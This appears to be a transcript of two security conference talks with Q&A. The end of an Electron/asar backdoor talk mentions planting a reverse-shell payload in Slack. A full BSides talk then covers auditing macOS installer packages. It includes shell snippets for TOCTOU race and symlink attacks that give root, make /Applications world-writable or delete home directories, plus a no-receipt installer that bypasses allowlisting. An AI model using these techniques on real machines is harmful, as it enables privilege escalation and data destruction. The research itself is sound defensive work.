if you try to change an exe file, you will change its hash. And by changing the hash, you will trigger some sort of alarms and alerts. In this case, nothing like that happens. The exe will always stay the same, nothing will change, and you might already have some sort of backdoored application that you have no idea is there. And because antiviruses do not check asar files, that means you might have something in those files that will never see the light of day. I was once on an engagement, and once I got the beacon back, I was already running as SYSTEM. No matter what I did, they were running some sort of weird — well,

weird, unknown endpoint protection. No matter what I did, it would just block everything. At that moment, I realized they had Slack installed, so I just put the PowerShell payload in Slack, and when the user logged in, it would just spawn the shell back. So if you want the source code, it's on GitHub, and I will also be at DEF CON Demo Labs on Friday if you want to come and see it in action, or play around with it, or ask any questions, or make a module, I don't know. You can come and have a look. And yeah, that's pretty much it. Any questions or anything you would like me to clarify? I realize this was quite a bit quicker than expected. - Hello. Hi. Thanks for

the presentation. I have a couple of questions, because you mentioned that CSP headers are honored. Yes. From an app developer's perspective, is it possible to use something like SRI — sub-resource integrity — to verify the JavaScript files inside the application? Would that stop an attacker? Because integrity checks on the whole archive — that's something that Electron has to do, right? You can't do it as an application developer, but you could use SRI, I'm thinking, to check the JavaScript files within your app. Yes, but that will only protect a specific file that you as a developer have inserted in the application. The attacker can insert their own. So it can load something from

example.com or attacker.com, and since they inject the JavaScript, they will just not put the SRI in and will load the file as normal. Thank you for the presentation, it was really nice. I was wondering — at some point you mentioned that Electron is on Node.js, right? Yes. So have you checked, was it able to access any resources that Node.js has access to? For example, I believe it also has access to the file system? Yes, yeah. So the Visual Studio Code example — the application was calling the Node.js file system, and that's how it's reading the file and sending it back. So anything that Node.js can do is accessible. - So that means we can

actually, like, this could be used to exfiltrate any files hosted on that workstation. - Yes, you can create your own browser-like C2 server and just double-click on folders and do whatever you want, yeah. - Great talk, thanks so much. I was just curious, maybe I missed this: for getting a reverse shell from the Electron context, how exactly does that work? - So you can call — actually, I can show you, I think it'd be easier. So if you do Linux, for instance. How do I — does anyone know the shortcut? Oh, there it is. Magic happens. Yeah, so you just use the Node.js net and child_process modules. You can just run whatever command you

want, on whichever host. As long as you have a one-liner to do it, you can just use it here and it will work fine. - And then you mentioned the privilege difference for the installed application. - Yes. - So how does that protect the process? - So let's say a user just double-clicks on the phishing email and the attacker gets in, but they're still running with the same privileges as that user. If Slack was installed in Program Files, you would not be able to change those files. So in that sense it's more secure, but the moment the attacker gets admin or

system, it's game over. - Okay, awesome, thanks. - Thank you very much. Enjoy the rest of the conference — and conferences. If anyone wants M&Ms that are not yellow — pardon? Yeah, sure, let me just pack this. Hi, Pavel, nice to meet you. - I would expect the exe itself to have the hash of the file, and when it runs it just does even an MD5 check. - I think if it's within — even if it's within — it should be within the exe. It's not in the exe; you literally bypass it. But the problem is that if it's in the exe, then you won't be able to change it without changing the exe. You want the whole thing. Yes. Yeah. - Yeah, because Spotify is installed on more desktops than Slack. A lot of people talk about Slack, but there are also other similar collaboration tools. Yes. - I use it, so now I'm scared. - Yeah, that's actually the one for tomorrow.



Good afternoon, everyone, and welcome to the BSides Las Vegas Breaking Ground track. This talk is given by Andy Grant, and it's Unpacking macOS Installer Packages. But before we get started, we want to thank our sponsors, including Valimail — that's how you say it, it's Valimail, not Valley Mail, I got confirmation on that — and Amazon, BlackBerry, NSA, and Microsoft, along with our volunteers who helped make this go. This track and talk is being recorded and streamed, so we ask that you put your cell phones away and on silent, and we'll let Andy get started. Thanks. Thank you. Yeah, so I'm going to be talking about packages — specifically Apple macOS installer packages and some security flaws in them. So first, a little

bit about me. I've been doing offensive security professionally for 11 years, and I've been doing security as a hobby since my early days, 20-plus years ago. I started out self-taught, just playing with computers, trying to figure out what was going on. That led me to pursuing a computer science degree at Stanford. Right out of undergrad, I joined iSEC Partners, a security consulting firm, and got to do some penetration testing. Then that got acquired by NCC Group; I stuck around, and I'm still with NCC Group. My professional career has been very application-security focused, ranging from web apps, mobile apps, native apps, and things that get installed. Over that time I did five years as a security consultant doing all

different manners of work, moving up the ranks there. Then I decided I'd try my hand at management — became a vice president, managed a team of 30 people. And for those five years I spent most of my time trying to figure out how I could make an excuse to be back on the projects that my team was supposed to be delivering. So I gave up management, and I'm back doing the technical work and what I love. That's the quick version about me. I'm better known around the world by my hacker alias, Dana Vollmer's husband. My wife is an Olympian; I get known as a plus-one everywhere I go. You can read all about it with a little bit of Googling. And yes, I do find time off to

support her and her goals. We're going to talk about why I did this research and how it came about. We're going to look inside the package — how do you get inside it and audit it — and then what can, and what have I seen, go wrong with these installer packages. So first, why was I doing this? Well, I've got trust issues. I don't like computers just doing things for me; I like to understand what they're doing. I don't trust the software that comes with them or the packages they download. Or on an engagement they're in a debug mode that is incompatible with our systems and whatnot, so we try to get creative. Sometimes all you have is the installation process to look at to provide the

client value. So you figure out ways to do that. So now we're going to look at the package and get into the technical bits here. The full technical name is Mac OS X installer flat packages. They have the .pkg extension. They came about around 2007 with OS X 10.5. There's little to no official documentation provided by Apple on what's inside these. They have tools for building them — they used to have better tools, actual UI tools; now it's sort of undocumented outside of man files and command-line tools. There is some good unofficial documentation out there, but it's fairly incomplete. There are parts of the package that are completely undocumented, but you can find bits and pieces and

piece things together by poking around or by opening them up yourself. It's a flat package — a single file. Specifically, it's an extensible archive, or xar. Before the flat packages came about, you had bundle packages. These are very similar to the .app application bundles you'll find, which really are just a folder that OS X knows how to open and look at. And you used to be able to just browse inside the folder, look inside, and see what was going on before running the installer. Now it became a little bit of an obscure archive type, and it became less obvious how to look at that. There are some tools provided.

Your Apple laptop comes pre-installed with something called pkgutil, a very handy tool that will allow you to look at packages and edit and modify packages. There are also some third-party tools out there. Suspicious Package is one specifically for looking at sort of what I'm talking about. It shows you the signing certificate and the files that are going to be installed, and does some checks on what may or may not be the norm for an installer. It rarely flags true security issues in my experience, but it does give you something like, hey, there might be something worth digging into. Plus it has some extra tabs to look at the files and the scripts that are

run by the installer, which we're going to get into in a bit. So pkgutil — this is a snippet from the man page. It's provided by Apple to query and manipulate the installer packages and the receipts. The receipts are the system's record of what has gone through the macOS installer and what files it has left behind on your system. That's a very handy thing to poke around with. Here's just a small snapshot of the commands you can use. Looking at the receipt package database, you can list the packages that have been installed and the files installed by those packages. You can do it in different formats, see what volume of your system — what drive — it was installed on, and the target directory those files were placed

into. When you list files, it just lists them relative to the package, not where they are in your file system. So you have to cobble that together with some of the package-info stuff — this was installed to this location — and then you go back to the list of files and you can see where all those files were placed. Then you can also mess with the packages: expand a package, and flatten back into a package. But let's take a look inside. To unpack it the easy way, use the provided tool. You just give it the expand command, give it the package, and give it a non-existent directory. It will create

that directory, extract the files into it, and you can go about browsing those. But, you know, that's the easy way. We're here to be hackers, to not trust the provided tools. So I can create the directory I want, change into that directory, and then use the xar command to extract the package. I do the create-directory and change-into-directory because xar doesn't support an output directory, so it just clutters the current working directory — you want to get into a clean working environment before you go through. So inside the package you'll typically find a Distribution file, which is an XML file, and a Resources directory, which has all manner of different images, licenses, readmes, backgrounds.

Then you'll typically have one or more package directories. These directories contain the bill of materials, or the list of all files that are installed; the PackageInfo, another XML file; and then Payload and Scripts, which are further compressed archives that sound really interesting. So let's dig into these files a little bit. The Distribution file is XML, and it can contain JavaScript. The XML defines the title that will be displayed in the installer, the welcome text, the readme, the background image, the little logo on there. It defines whether you need to do nothing, restart, or shut down your system after the installation is complete. And then it can contain scripts that are triggered by installer checks. So you can define an installer check,

and the installer check references a JavaScript function that is then defined within script tags within the XML document. It uses a subset of JavaScript called InstallerJS; Apple does provide documentation on that. PackageInfo, another XML file, easy to read and look at, contains sort of meta information about the package: the installation requirements, how many files are being installed, what's the total number of bytes being installed. It also defines where the files are going to be installed and what permission level the installer needs to run at. It will also include paths to scripts that need to be run pre-installation and post-installation.
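To make that concrete, here is a sketch of what a Distribution file with one of those JavaScript installer checks can look like. It is not taken from any real package — the bundle identifier, file names, and the memory check are invented — but the element names (installation-check, script, pkg-ref) follow Apple's Distribution XML format:

```xml
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
    <title>Example App</title>
    <background file="background.png" alignment="bottomleft"/>
    <!-- the check references a JavaScript function defined below -->
    <installation-check script="checkRam();"/>
    <script>
    // InstallerJS, not browser JavaScript: system.* and my.result are
    // objects the macOS Installer provides to these embedded scripts
    function checkRam() {
        if (4 * 1024 * 1024 * 1024 > system.sysctl('hw.memsize')) {
            my.result.title = 'Not enough memory';
            my.result.message = 'This example needs at least 4 GB of RAM.';
            my.result.type = 'Fatal';
            return false;
        }
        return true;
    }
    </script>
    <choices-outline>
        <line choice="default"/>
    </choices-outline>
    <choice id="default">
        <pkg-ref id="com.example.app"/>
    </choice>
    <pkg-ref id="com.example.app">#example.pkg</pkg-ref>
</installer-gui-script>
```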

You have the bill of materials. This is, like I was saying, the list of all files to be installed, updated, or removed from the system. It includes the file permissions, the owner and group, and the size and creation time — all that normal file system information for each of the files. The Payload — this is where we're getting into more interesting stuff. The Payload is the files that are actually going to be installed. It's actually a CPIO archive that has then been gzip compressed. This is the archive that contains all of those files called out in the BOM. It is what gets extracted into your file system at the location that PackageInfo specifies, the install location. This

is just the installation part of the process: it's an extraction of an archive onto your system. There's nothing fancier than that that really goes on as far as the files that get placed on the system. You can also have an optional scripts archive. This is the same as payload: a CPIO archive that's been gzip-compressed. You have pre- and post-installation scripts and additional resources. It can really contain anything — it's an archive, you can put whatever you want in it. I've seen README files that were then pulled out and referenced by the distribution instead of being in the resources. You can see some of the payload files, for whatever reason, being in here. Anything you want your scripts to be able to directly interact with should be

in this archive. The scripts can be Bash, Python, Perl — those are the most common. But really the only requirement is that it has to be executable and has to have an appropriate shebang. This archive, when the installer is running, is extracted to a random directory, a temporary directory that's not predictable. So it's not really something you can mess with unless you sort of pause the installer, don't click the next buttons, look at the run environment and find where that directory is, and then you can go look at what got extracted. Or you can open it up yourself — you already extracted the larger package. Let's look inside this gzipped CPIO file. So, the long way to do this is you can cat the contents

of the archive into gzip to decompress it and pipe that into cpio, telling it it's taking input, and it'll dump all the contents of that archive right into the current working directory. But cpio actually natively recognizes gzip-compressed files, and so if you just send the archive directly into it, it'll extract right into the current working directory. However, if you did this the easy way initially using pkgutil --expand, this was all done for you, and instead of the scripts object inside the directory that was created being an archive, it is already a folder, and that folder contains the contents of the scripts archive. There is no actual scripts archive if you do the expand

command. Payload, same as scripts: skip right to using cpio. Sometimes the payload contains further packages, and so you recurse through this process, expanding all the packages, opening all the script files, finding everything that you may want to audit or look at for security issues. However, you're blowing up all these files; if it's a big application, you may be worried about your disk space. So you can check out the BOM, which, like I said, lists out everything. Run lsbom, and it will just list out all the files. And then you can look through and see if there's anything you feel may be worth opening up the package to extract and look at. Unlike scripts, if you use pkgutil --expand,

this does not automatically expand the payload. You do have to go in and manually extract it if you want to get the files out without running through installer. Okay, so what happens when we double-click this package and installer launches? Well, rough order of execution — the things we care about here, what gets executed on the system. It parses the distribution file if it's present; it checks for installation checks, looks to see if there's any scripts to call, calls that JavaScript function defined within the distribution, and executes through it. That function can call further functions and whatnot, as long as they're all defined there within the distribution file. Then you click next, going through your installer, and you get to the pre-installation

phase. This happens before extracting the payload archive onto your file system. If the package info defines a pre-install file — this path is relative to the script archive — it goes in, extracts the scripts, executes the pre-install file, and moves on to extracting the payload. The payload is extracted into the install location as specified in the package info. And then we move into the post-install phase: if there's any post-install scripts defined, it goes through and opens and executes those files. So now we get into the fun bits. What can go wrong here? Well, the interesting parts are the scripts that get executed and the files that get written to your file system. So, with scripts, you've got

the pre-install, the post-install, they can contain other scripts, like I was saying, that can be called from pre-install, post-install. Look at them, audit them, read the bash scripts, read the Perl, Python scripts, normal mistakes people will make in those, we'll talk about the specifics in just a bit. Or the payload archive may actually have its own scripts that are easy to audit. I like the scripts. It's a text file. They're easy to look at. So you can find uninstall scripts, various debugging or help scripts that get written with the application. Or you can go look at native applications and those issues, brush up on your reverse engineering and debugging skills. You got the binaries, you got the kernel modules, you got the libraries right there. You can go open

those up, look at what's going on from a non-runtime environment, since before it ever gets installed on your system it's just placed there within a directory of your choosing. So the types of issues that I was encountering, and I'm going to talk about, are largely TOCTOU: time of check to time of use. Except almost all of these happen without any check — they just go and use, assuming the files are safe and ready. Most of this happens within the temp directory. So they make assumptions that anything I put in temp is safe to read, or safe to write to, or safe to execute. Fun thing about temp is anybody can write to it. It's world

writable. Yes, once you write to it, generally your permissions are locked and other people can't write to those files, but you have to make sure that you were the first one to write there — hence the TOCTOU. Plus, I've seen people just granting 777 file permissions — read, write, execute access for everybody on the system — to the files they place around, either in the temp directory or in the application directory or in Application Support or the libraries. It gets kind of messy. So now we're going to look at real issues in real packages that I've seen in the past eight months. We're going to look at a normal-user-to-root privilege escalation, some symbolic link

abuses, privilege escalation from any user on the system to the current running user, arbitrary directory deletions, and arbitrary code execution. The first one: here you have a normal user who launches this installer. When the installer runs and it doesn't require root privileges, it can go drop this installer util file into the temp directory as the current user, and then it goes and tries to do root-privilege actions in the post-install, which triggers installer to say, I need to run with administrative privileges. You'll see the prompt: enter administrative username and password. And so the catch here is that the installer util file is owned by the current user. But that user may not be the person who

had the password to do sudo actions, to do administrative actions on this machine. Say it's your corporate laptop, you want to install a video conferencing app, you know it has this vulnerability, and so you ask your IT to go and install this package for you. They're going to type in their username and password to allow it to install. But behind the scenes, you're waiting: while that file doesn't exist, do nothing. Once it does exist, delete it, copy your exploit into that location, and then you wait for the post-install to go and call it with root privileges. And on your local system, the person installing it just escalated you up to root privileges on this laptop.
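The attacker's side of that race can be sketched in a few lines of shell. The function name and file names here are hypothetical stand-ins, and this just shows the swap logic, not a real installer run:

```shell
# Wait for the installer to drop its helper file, then replace it before
# the post-install phase executes it with root privileges. swap_helper and
# the paths you'd pass it are made-up names for this illustration.
swap_helper() {
    target=$1
    exploit=$2
    while [ ! -e "$target" ]; do :; done   # spin until the file appears
    rm -f "$target"      # owned by the installing user (us), so deletable
    cp "$exploit" "$target"
    chmod 755 "$target"  # post-install now runs our code instead
}
```

In the real attack the loop sits there before the victim ever clicks Install; the window between the installer writing the helper and the post-install executing it is what makes this a race.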

The next issue, symbolic link abuse, is twofold here. In the pre-install, it tries to do some cleanup: it wipes away this NS installation file. And then during the post-installation — it's written some stuff to that file earlier in here — it changes the permissions on that file to 777, and then it changes the owner of the file to the current user. The fun thing here is any user on the system can preemptively create that file and wait, so that when this gets removed, you're sitting there ready. So: while that file exists, do nothing; then the pre-install triggers, the file no longer exists, so we move in here and create our symbolic link at that filename, pointing at /Applications. So the change permissions will follow that symbolic

link, and since it's running with root privileges, it will change /Applications to now be world-writable by anybody on the system. And then it will also change the owner of it to the current user installing the file. So this just grants any user, any process on the system the ability to go install anything they would like into /Applications. I didn't choose /etc because the chmod isn't recursive — it's not -R — so it wouldn't make all the files in there world-writable. But I can now go and install different applications in there, which can lead me to compromising other users once they go about executing the applications I've put on there.
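The primitive underneath this is that chmod (and chown) dereference symbolic links. A self-contained demo with stand-in names — `Applications` here is just a local folder, not the real /Applications:

```shell
# chmod follows symlinks by default, so a pre-planted link turns
# "chmod 777 <dropfile>" into "chmod 777 <wherever the link points>".
cd "$(mktemp -d)"
mkdir Applications                    # stand-in for /Applications
ln -s "$PWD/Applications" dropfile    # attacker pre-plants the link
chmod 777 dropfile                    # follows the link to the directory
# GNU stat first, BSD/macOS stat as the fallback:
stat -c %a Applications 2>/dev/null || stat -f %Lp Applications   # → 777
```

Run as root against a link the attacker controls, that one chmod is the whole world-writable-/Applications bug.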

A regular-user privilege escalation. The vulnerability here is in the pre-installation. It again tries to do some little cleanup, saying, oh, sometimes I place a 7-zip file here if this installer had been run previously: remove the 7-zip file, go through and unzip the 7-zip package that we brought with us in our payload and output it into the /tmp directory, then go through and execute that file to extract some more stuff into the directory we're going to put the file contents in. So any user, any process can attack the installing user here. Notice nothing's running as root, so we're not gaining root privileges on this system, but it's very easy: I copy my exploit into the directory before this installer is

ever run. The file is owned by the attacker, and since the installer is not root, it can't delete it, it can't overwrite it — but it sure as heck can execute it. There was no check to make sure that the owner of the 7-zip file was what this installer expected it to be. And so, since that file exists and it can't delete or overwrite it, it still exists there, and the installer will happily go through and execute it with the installing user's privileges.
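The missing check is small. A sketch of what the pre-install could have done before trusting the pre-existing file — the file name is a stand-in, and staging into an unpredictable mktemp -d directory instead of a fixed /tmp path would avoid the shared-path problem entirely:

```shell
# Before executing a file that may already exist in a shared directory,
# verify you own it. (GNU stat, with the BSD/macOS form as a fallback.)
cd "$(mktemp -d)"
touch 7z                      # stand-in for the pre-staged 7-zip binary
owner=$(stat -c %u 7z 2>/dev/null || stat -f %u 7z)
if [ "$owner" = "$(id -u)" ]; then
    echo "owner ok, safe to execute"
else
    echo "unexpected owner, refusing to run" >&2
    exit 1
fi
```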

Another one — this happens outside of the installation scripts. Like I said, the payload might have other scripts that get run. At some point during this application's lifecycle, it calls out to a script that got installed through the payload. It does a little cleanup of stuff: it was populating this directory with some debugging information, and then it cleans up when it's done. It does a recursive, forced remove of SDU/* and a remove-dir of SDU/. So, the way symbolic links work on the Apple system is that with the trailing slash, it'll follow the symbolic link. Now, we're not running with root privileges, so for our attack, they have to be deleting something that they have permissions to delete. So you

pick their home directory and create the symbolic link before the script ever runs with the application. The slash-star puts the glob inside the victim's directory; it follows through and deletes every file in their directory — recursively, forced, no prompt. And then remove-directory with the trailing slash will actually follow the symbolic link. If you don't have the slash there, it tries to remove the symbolic link itself, which isn't a directory, so it fails out. You put the slash there, it follows the symbolic link, and now you just blew away their actual home directory as well as all the files in it. And you have a symbolic link left around that points

to nothing. Then we get to arbitrary code execution, or arbitrary installation. In the package info, this package defines an install location, meaning its payload is going to extract all of its contents into the temp directory, into RazerSynapse. It's going to do it with root privileges. And so in the post-install it goes into that directory, looks for all the package files, and then for each package file it finds, it installs that package. Running it from the command line like this doesn't pop up the UI, skips all user interaction, and just force-installs it with our root privileges. So, install location — when you're extracting this payload, it doesn't care if that directory already

exists. So you can go ahead and pre-create that directory. It's going to put whatever package files you want in it, and it'll be your package files, and it'll happily go through and find all of them for you. This has been fixed, and so... We're going to demo it. We're going to look at this. We're going to go through the whole process I just talked about. We're going to download a package. We're going to open up that package, look at the files inside, check the distribution file for installer checks, go through, find the vulnerability, create our exploit for this, execute that exploit. So here we go. Go download it. It looks like I'm downloading it from their real website, but I

actually hijacked the DNS and used a vulnerable package since, like I said, they had fixed this. So we go create our directory, we extract the file, and now we're in. We extracted the package, opened up the distribution file, and now we're looking: okay, are there any installation checks? That's mainly what I was concerned about when looking at these. Nothing really fancy going on in here. Great. We'll go into the package directory, look at the files, and now we're going to look at the package info file. Okay, so we have the package info file. We see the install location, and that it's running with root. We also can note

that after installation it's going to require us to restart. You can see here, like I was saying, it has the number of bytes installed, the number of files that it installs, and the script that runs after the payload is extracted. Great, let's go look at those. So now we're going to extract the scripts file. First we make our directory so we don't clutter where we're currently working. Extract the scripts. Look at what's in there. And now we're going to open up the post-install, and we're going to look through the file, the code, looking for anything of interest. Go through — here's our vulnerable bit that we're going to play with. And so now we'll want to go through and create

our malicious payload, and to do that we're going to switch to our attacker, Mallory, and she's going to go through and develop this exploit for us. So first we have to create the directory we're going to write our script into, because we want to have some script run. Create our script — we're just going to do a simple shell file. We're going to touch a file in the temp directory to prove that we ran. We'll date it. We'll show what user we ran as, with what privileges. And no exploit is complete without popping calc, so we'll pop calc at the end. Now we make that file executable — if it's not executable, it doesn't work. And then we

use pkgbuild to create the package that we'll then put into the temporary directory.
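That build step is roughly the following (macOS-only pkgbuild; the identifier and paths are placeholders, and ./scripts holds an executable postinstall with a proper shebang):

```shell
# macOS-only sketch: a no-payload package whose only content is the
# scripts archive. Nothing here is from the talk's actual demo files.
pkgbuild --nopayload \
         --scripts ./scripts \
         --identifier com.example.demo \
         exploit.pkg
```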

So here you can give an identifier. If you don't give an identifier, it automatically creates one for you, but for our purposes right now this isn't very important. We specify that there's no payload — there's no files we're installing here, so don't worry about trying to make the payload archive. And then we specify the scripts directory to make the script archive; we just give it the directory and it'll archive up everything in there. The package got created, we're going to create the directory and move our payload into that directory. Great, now we just wait for somebody to come along and run the installer for us. So Bob is going to be here and install the

package, go through — he's not an administrator, so we need Alice to come in and type in her password for us. She's going to go, run, there's our calc pop, and then we go look and confirm that we ran with root privileges. So that is start to finish: downloading a package, opening up a package, looking at all the different parts of it, seeing a vulnerable part of the scripts, creating a payload that exploits it, and waiting for the installation to take place. So while looking at these installers, I noticed some things that were unexpected. Some I sort of hypothesized myself, some I saw in the packages. But that no-payload package that I demonstrated there — it leaves no receipt. Remember I talked about

receipts at the very beginning here. So the receipt is the package identifier — you can look up all the package identifiers that have been installed on your system — and then it's also the files that were installed. If you don't install any files, it doesn't record your package identifier and it doesn't record any files, because you didn't install any. So there's no record of that payload executing, whereas there is a record of that Razer package executing on the system, and all of its subparts with their identifiers. Also, for fun, you can pull this out of the pre-installation scripts and put it into the distribution's install checks, where you're supposed to be checking system compatibility, and instead execute everything right there. It's basically a one-click install, and we'll

take a peek at that. So here we're going to look at the packages on our system. This just scrolled off the screen — all the packages that are installed on here. If you scroll to the top, there's a lot of Apple packages; you can actually look at what came installed on the system via the installer. So we're going to look to see: are there any NCC packages installed here? There aren't any. Cool. So now we're going to show that I pre-created a payload directory, and now we're going to build a package with an NCC Group identifier, so it will show up in our list. This is where I say — this is sort of the create-payload command — this is our payload's

root directory. And then I'm going to say the install location is the temp directory, NCC Group. Create our package, run the package, go through, install — great, look at the files there. The things were installed, and then we'll go and confirm that there is now a receipt of what we installed on the system. You could also then do pkgutil --files, give it this identifier, and it would list out foo and bar as the files that were installed. So now we're going to go through and create a no-payload file, and I'm going to do it through the distribution's installation check. So I want to create the CPIO gzipped archive payload and include it in our scripts

folder, because I want everything to be contained within the scripts since I'm not doing a payload file. So now I'm going to go look at this script I have. This script is pretty straightforward. I define an application directory — the same one we were just installing into. I clean it up. I remake the directory. I copy the payload — when you're in your scripts, all your paths are relative to the script archive — and so I copy the payload into that directory, then go into that directory, extract the payload, and then remove the package. The -d here just means create any necessary folders and directories as you go, sort of like mkdir -p. And then I get fancy and I kill the installer, because we're done.
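Here's a runnable stand-in for that script with the same shape: it builds a tiny gzip-wrapped CPIO payload, extracts it with cpio's -d flag, and leaves the macOS-only "kill the installer" step as a comment. All names and paths are illustrative, and a scratch directory stands in for /Applications:

```shell
#!/bin/sh
# Build a small gzip-wrapped CPIO payload so the extraction step is
# demonstrable anywhere, then mimic the one-click script described above.
cd "$(mktemp -d)"
mkdir -p scripts payload && printf 'app\n' > payload/app.bin
( cd payload && echo app.bin | cpio -o 2>/dev/null | gzip ) > scripts/payload.cpio.gz

APPDIR="$PWD/Applications/Example.app"       # stand-in install target
rm -rf "$APPDIR" && mkdir -p "$APPDIR"       # clean up, remake the directory
cp scripts/payload.cpio.gz "$APPDIR/"        # paths relative to script archive
cd "$APPDIR"
gzip -d < payload.cpio.gz | cpio -i -d 2>/dev/null   # -i extract, -d make dirs
rm payload.cpio.gz
# killall Installer   # macOS: tear down the UI once the payload is placed
cat app.bin   # → app
```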

This is all I wanted to do: install my payload. I don't need the installer process anymore — go ahead and kill it. So let's go look at that distribution file. Here's the title that I'm going to have it show. Here's a package reference identifier. And then I say I allow external scripts — that means I can now do system.run and call things in the script archive. So now I have this installation check; the install check looks for the script definition that's defined here and does system.run. Like I said, system.run can only run files that are in the resources directory or in the script archive. That's the script we had already looked at. Now we're going to go build our package. When you do a pkgbuild, it doesn't actually

include a distribution file — that's for productbuild. But productbuild expects you to embed a package in there; it gets all complicated. So I'm going to create a package, a no-payload package with that script. I'm going to expand that package, copy my distribution file in there, and then flatten that package back up. So now I created the package so the installer will understand it, I extracted the information from it, copied my distribution file into there, and then I say, please go flatten that back up. It'll pull the script archive back into the CPIO archive and put the whole package back into xar format. Now I'm going to run this payload. That was it — my payload just got installed.
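That build-expand-patch-flatten dance, as a rough macOS-only sketch (all names are placeholders):

```shell
# macOS-only sketch: pkgbuild won't embed a Distribution file (that's
# productbuild's job), so build, expand, patch, and flatten by hand.
pkgbuild --nopayload --scripts ./scripts \
         --identifier com.example.oneclick inner.pkg
pkgutil --expand inner.pkg expanded
cp Distribution expanded/Distribution
pkgutil --flatten expanded oneclick.pkg
# Headless alternative to double-clicking the result:
#   sudo installer -pkg oneclick.pkg -target /
```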

We can go back, for those that might not have been paying attention — it happens really fast. There it is. The moment I click that, the installation... so that pop-up says you're going to run an installation check. And that installation check runs our script. And then that script extracts the payload and kills the installer, and that's why it disappears the moment I click that continue button. Everything just got installed successfully. You can go look at that. It's all relative to when I did the find command — it was package/payload/ and the files in there. Now we're going to go look. And it's still just that first payload. There is no record that I just

installed these files on the system. I bypassed the system's record of my installer running, but I still got to do everything I did. Plus, I didn't have to type in an administrative password, so I skip that step. One-click install after the installer's opened up. Super user-friendly. Super kind of weird. And so that is that. You can go do a bit more with package installers, and it gets sort of fun when you start to play around. The fantastic people over at Praetorian did a two-part blog post about using installer to bypass application whitelisting on OS X, specifically Google Santa, which is one of the better-known, better-used application whitelisting programs. The way it works, it works at the execv

level, and installer, the binary, is whitelisted. So it's basically at the binary level — you can't do it at the process level or whatnot; it's the things that get executed. So everything that runs in installer checks, everything that runs in those pre- and post-install scripts, runs as part of the installer binary, the installer process, which is whitelisted. So you can use the install checks with the kill-installer trick to make a one-click payload that bypasses Google Santa, the application whitelisting. Fun for red teaming, which is what they talk about, how they use it. Obviously not fun for anything but testing. That covers macOS installer packages and things you can find with them.

I knew everybody was going to have a lot of questions, so I sped through that. So we've got like 10 minutes for questions. I saw a hand pop up over here. I believe we have a microphone, unless you feel like you've got a booming voice. Well, let's find out. What about the audit daemon that runs on Mac OS X? I think the OpenBSM audit daemon — would it capture your actions? The audit daemon? Like Gatekeeper? No. Oh. I didn't play with auditd. So some of those actions — obviously, if I'm touching places that it's monitoring, it'll still trigger. But if it whitelists installer, installer can do whatever it wants. And that's

sort of the flaw that happened with Google Santa: it's sort of limited in what it can or can't allow and deny. And so it has to allow installer, because that's the expected use, and so anything that installer does is approved by the whitelisting. Right, yeah, it would allow the process or the execv without the context of it doing something. Right. So yeah, I wonder — yeah, audit usually, I think it gets most system calls, and they tie into an EDR. It does, it captures everything. Okay, yeah. But nobody reads it, so. Yeah, yeah, so there's probably some logs that you can go and audit and look at. I don't know, maybe osquery

has something for it that can be pulled into some central logging. Thanks. Yeah. There was also a leapfrog back, yes. Hey, thank you very much. How often do you come across packages that don't execute as root? Because that seems to be the default that I see. And then it was weird seeing the sudo in the scripts, because they always inherit it. Yeah, so that was an interesting thing in my auditing. Everything seems to install as root. If you notice, when I did my demo of the this-will-leave-a-receipt package, where I was just writing into the temp directory, it actually required me to enter an administrative password. There is not

a way with just pkgbuild to build a package that doesn't require root. So I could have gone in, manually edited that package info file, changed the auth from root to none, and then it wouldn't have prompted for that. Or when you do productbuild and a proper distribution file, you can set the permissions. But most people just inherit the default. Everybody expects to have to run as an administrator when you install anything. And so even if you don't need the administrative powers when you're installing — like you're installing to the user's local application directory — it still writes it with root privileges. Over here. - Yeah, do you see a lot of this being used in malicious software and

red team testing? I mean, how much do you see this in the wild? - So, see it in the wild, all the time, at least six times in eight months. But as far as maliciously in the wild, I haven't known malware to do this. It is much more of the red teaming process. The Praetorian blog post talks greatly about why they chose this route. One of the key parts about doing a red team is it has to be within the user's expected norm on the system to fly under the radar. Installing something is very much part of the expected norm. They even went so far as getting a proper Apple developer certificate and they signed their package. If you had downloaded this and it was

unsigned, you would have to go in and click through System Preferences, you know, install anyway, which is outside the user's norm for most people. And so it's not hard to get that developer certificate, it's not hard to sign it, and then just have it emailed around and whatnot. Here, because I built them locally and just ran them locally, I don't get those alerts or concerns. But if they had been tainted by coming down through the browser, they would have been flagged.

Well actually, building off of that, I have seen the install-during-the-installer-checks in the distribution file — that one-click install — in the wild, but not maliciously. It was for user experience. It just has the side effect of bypassing the receipt, but it is that one-click install: you instantaneously get your application installed and everything. But this would be really good for, like, a supply chain attack. Right, yeah. I have a quick comment. Jaron Bradley at RSA this year used the installers to bypass SIP by predicting those temp directories that they create, that you mentioned. Okay, yeah, those temp directories — I didn't want to go through the effort of seeing if they were predictable, but that's awesome that he was able to predict them, because it

is one of those /tmp, temp-dot-blah-blah-blah garbage-seeming paths, and so — oh, nice. Yeah, because I would imagine if you could sort of hijack the location that's going to be, you can do some of these symlink attacks and the same things. Up front.
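Those symlink attacks are easy to reproduce with stand-in directories. This demo mirrors the SDU deletion from earlier — the glob resolves through the link on any Unix, while the trailing-slash rmdir behavior is the macOS part:

```shell
# The glob in "rm -rf <dir>/*" is expanded by the shell, and path
# resolution walks through the symlink, so the victim's real files go.
cd "$(mktemp -d)"
mkdir -p home/docs && touch home/docs/secret   # stand-in for a victim's files
ln -s "$PWD/home" SDU                          # attacker pre-plants the link
rm -rf SDU/*        # glob expands through the link: home's contents are gone
ls -A home          # prints nothing; the symlink itself survives
# On macOS, a following "rmdir SDU/" (note the trailing slash) would also
# remove the home directory itself, leaving only a dangling link behind.
```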

Hi, with relation to the privilege escalation that you showed, isn't this kind of like the — what do you call it — the security auth trampoline all over again? Yeah, it is sort of just hijacking the user's already-authed prompt, or basically throwing up the prompt. Particularly the escalation — I don't know if you're talking about up to root or the other one. Up to root, yeah. Yeah, this one, you know, I could also create my own installer that will give me root privileges and then go, hey, IT admin, I'm installing video conferencing software, can you come type in your password? It works better if I just say, here's my laptop, could you install the video conferencing software? Because I know I could, in

the background, be doing this. But yeah, it is very similar to those types of attacks. All right, thank you.

During your exploration of the package format and the specification, did you find any built-in mechanisms for developers to use for updates? Or was that something they had to hand-jam themselves? And if so, is that some vector for persistence or privilege escalation? That way you don't have to potentially know beforehand whether or not a package should be installed or be used within the organization. Yeah, you can — in the package info and in the distribution, you can specify whether this is an update. And then a lot of the time, the way I saw developers doing this was in the pre-install: they would check, does this file pre-exist, and then check the version of it and whatnot. But you can also include in the package info that this is this version.
